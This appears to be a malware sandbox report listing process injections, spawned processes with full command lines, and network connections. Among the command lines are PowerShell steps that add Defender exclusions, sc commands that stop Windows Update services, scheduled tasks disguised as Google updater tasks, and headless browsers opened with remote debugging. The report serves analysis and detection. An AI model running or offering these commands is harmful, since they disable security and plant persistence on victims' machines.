PID 1484 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1484 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1484 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3816 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3816 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3816 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3816 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3816 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1484 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1484 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1484 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 376 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 376 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3412 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 1500 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 1500 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5060 wrote to memory of 3208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3816 -ip 3816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 284

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffacb239758,0x7ffacb239768,0x7ffacb239778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=56512 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1320 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1684 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=56512 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1976 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=56512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1952 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=56512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2568 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=56512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3204 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=56512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3392 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=56512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2616 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3480 --field-trial-handle=1468,i,2635314597832475149,12586408098179650270,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x308 0x338

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=43317 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG" --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffacd9a46f8,0x7ffacd9a4708,0x7ffacd9a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1688 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1704 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2016 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#xkdrvuagsyzbwgunlsb#> powershell <#xkdrvuagsyzbwgunlsb#> -Verb <#xkdrvuagsyzbwgunlsb#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3088 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=43317 --allow-pre-commit-input --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3380 /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1508,10279509759280621852,11055262424386862408,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=audio --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=3544 /prefetch:8

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 12:04 /f /tn TaskManagerCheckUpdate_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 12:04 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.123.41.162:80 www.microsoft.com tcp
NL 104.123.41.162:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 185.159.129.168:80 tcp
US 8.8.8.8:53 162.41.123.104.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 ogs.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 126.136.241.8.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 174.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.54:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 54.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 2.214.58.216.in-addr.arpa udp
N/A 127.0.0.1:56512 tcp
N/A 127.0.0.1:56512 tcp
N/A 127.0.0.1:56512 tcp
N/A 127.0.0.1:56512 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 216.58.208.98:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 98.208.58.216.in-addr.arpa udp
GB 216.58.208.98:443 googleads.g.doubleclick.net udp
NL 142.251.36.54:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
